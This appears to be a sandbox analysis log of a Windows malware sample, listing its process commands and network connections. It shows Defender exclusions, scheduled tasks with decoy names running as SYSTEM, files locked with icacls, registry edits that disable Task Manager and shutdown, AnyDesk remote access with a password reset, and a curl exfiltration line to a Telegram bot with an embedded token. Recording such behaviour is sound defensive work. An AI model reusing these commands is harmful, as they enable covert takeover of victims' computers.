"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd9ea73cb8,0x7ffd9ea73cc8,0x7ffd9ea73cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6756 /prefetch:1
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --service
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2784 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1276 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7276 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7408 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7520 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4120 /prefetch:1
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --control
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004EC
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://spankbang.com/tv/?station=hypno+joi
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd9ea73cb8,0x7ffd9ea73cc8,0x7ffd9ea73cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force
C:\Users\Admin\AppData\Roaming\locked.exe
"C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DD12.tmp\DD13.tmp\DD14.bat C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7092 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8680 /prefetch:1
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/Anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\schtasks.exe
schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /run /tn "MicrosoftEdgeUpdateTaskList"
C:\ProgramData\Anydesk.exe
C:\ProgramData/Anydesk.exe
C:\Windows\system32\schtasks.exe
schtasks /run /tn "SystemTaskNavigator"
C:\ProgramData\stn.exe
C:\ProgramData/stn.exe
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\246C.tmp\246D.tmp\246E.bat C:\ProgramData\stn.exe"
C:\Windows\system32\timeout.exe
timeout /T 30 /NOBREAK
C:\ProgramData\Anydesk.exe
"C:\ProgramData\Anydesk.exe" --control
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\ProgramData\Anydesk.exe" --get-id
C:\ProgramData\AnyDesk.exe
C:\ProgramData\Anydesk.exe --get-id
C:\Windows\system32\curl.exe
curl -k -f "https://api.telegram.org/bot7196577299:AAEob7nYSq_eAD8egojP3Pct71tZ1r_lZnI/sendMessage?chat_id=-1002158648396&text=Admin-1051708320"
Network
| Country | Destination | Domain | Proto |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| RU | 88.212.201.198:443 | counter.yadro.ru | tcp |
| NL | 142.250.27.92:443 | pay.google.com | tcp |
| US | 8.8.8.8:53 | 229.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.147.200.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.201.212.88.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 142.250.27.92:443 | pay.google.com | udp |
| GB | 142.250.178.14:443 | google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 74.125.250.129:19302 | stun.l.google.com | udp |
| NL | 142.250.27.92:443 | pay.google.com | udp |
| NL | 142.250.27.81:443 | pay.sandbox.google.com | tcp |
| FR | 142.250.179.98:443 | googleads.g.doubleclick.net | tcp |
| US | 104.21.4.208:443 | cdn.iplogger.org | tcp |
| IE | 2.18.24.11:80 | apps.identrust.com | tcp |
| FR | 51.178.66.33:443 | gofile.io | tcp |
| FR | 51.178.66.33:443 | gofile.io | tcp |
| FR | 151.80.29.83:443 | gofile.io | tcp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| DE | 78.46.174.169:443 | ad.a-ads.com | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| NL | 185.229.191.44:443 | boot.net.anydesk.com | tcp |
| GB | 195.181.165.153:443 | relay-79bdf984.net.anydesk.com | tcp |
| US | 134.209.68.5:443 | clicktotweet.com | tcp |
| US | 134.209.68.5:443 | clicktotweet.com | tcp |
| US | 134.209.68.5:443 | clicktotweet.com | tcp |
| BE | 64.233.166.155:443 | stats.g.doubleclick.net | tcp |
| US | 104.244.42.1:443 | twitter.com | tcp |
| US | 104.244.42.1:443 | twitter.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| PL | 93.184.221.165:443 | t.co | tcp |
| US | 151.101.188.159:443 | pbs.twimg.com | tcp |
| US | 8.8.8.8:53 | 1.42.244.104.in-addr.arpa | udp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| NL | 185.229.191.44:443 | boot.net.anydesk.com | tcp |
| US | 151.101.188.158:443 | video.twimg.com | tcp |
| US | 104.244.43.131:443 | abs-0.twimg.com | tcp |
| GB | 57.128.141.154:443 | relay-aeafd8c0.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 165.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.188.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.43.244.104.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| NL | 142.250.102.84:443 | accounts.google.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| NL | 142.250.102.84:443 | accounts.google.com | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 104.19.130.98:443 | stats00main3831.spankbang.com | tcp |
| US | 104.19.130.98:443 | stats00main3831.spankbang.com | tcp |
| US | 104.16.5.5:443 | tb.sb-cd.com | tcp |
| US | 104.16.5.5:443 | tb.sb-cd.com | tcp |
| US | 104.16.5.5:443 | tb.sb-cd.com | tcp |
| GB | 89.187.167.4:443 | a.magsrv.com | tcp |
| GB | 89.187.167.4:443 | a.magsrv.com | tcp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | tcp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | tcp |
| US | 104.16.5.5:443 | tb.sb-cd.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 104.16.5.5:443 | tb.sb-cd.com | tcp |
| US | 104.16.5.5:443 | tb.sb-cd.com | tcp |
| US | 104.16.5.5:443 | tb.sb-cd.com | tcp |
| US | 104.16.5.5:443 | tb.sb-cd.com | tcp |
| US | 104.16.5.5:443 | tb.sb-cd.com | tcp |
| US | 104.16.79.73:443 | static.cloudflareinsights.com | tcp |
| US | 104.19.131.98:443 | stats00main3831.spankbang.com | tcp |
| US | 8.8.8.8:53 | 166.33.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.24.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.79.16.104.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 172.64.147.206:443 | go.xlviirdr.com | tcp |
| GB | 195.181.164.15:443 | a.magsrv.com | tcp |
| GB | 195.181.164.15:443 | a.magsrv.com | tcp |
| US | 104.18.176.151:443 | impactserving.com | tcp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| NL | 95.211.229.248:443 | s.magsrv.com | tcp |
| NL | 95.211.229.248:443 | s.magsrv.com | tcp |
| GB | 89.187.167.7:443 | s3t3d2y8.afcdn.net | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 104.18.40.50:443 | go.xlviirdr.com | tcp |
| US | 172.64.147.206:443 | go.xlviirdr.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 104.18.48.21:443 | video.ktkjmp.com | tcp |
| US | 8.8.8.8:53 | 50.40.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | creative.mnaspm.com | udp |
| US | 8.8.8.8:53 | vstream-15.sb-cd.com | udp |
| DE | 156.146.33.59:443 | vstream-15.sb-cd.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 104.18.40.50:443 | creative.mnaspm.com | tcp |
| US | 8.8.8.8:53 | 59.33.146.156.in-addr.arpa | udp |
| FR | 172.217.20.196:443 | www.google.com | udp |
| DE | 108.138.36.13:443 | video.saawsedge.com | tcp |
| US | 104.17.11.106:443 | img.strpst.com | tcp |
| US | 104.17.118.12:443 | strp.chat | tcp |
| US | 104.17.118.12:443 | strp.chat | tcp |
| US | 8.8.8.8:53 | 196.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.36.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.11.17.104.in-addr.arpa | udp |
| US | 54.230.228.127:443 | edge-hls.doppiocdn.net | tcp |
| GB | 216.58.201.99:443 | id.google.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | udp |
| FR | 172.217.20.206:443 | encrypted-tbn2.gstatic.com | tcp |
| FR | 172.217.20.206:443 | encrypted-tbn2.gstatic.com | tcp |
| DE | 108.138.36.24:443 | cdn.britannica.com | tcp |
| FR | 172.217.20.206:443 | encrypted-tbn2.gstatic.com | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:38674 | udp | |
| N/A | 239.255.102.18:12440 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:5563 | udp | |
| N/A | 239.255.102.18:25391 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:8214 | udp | |
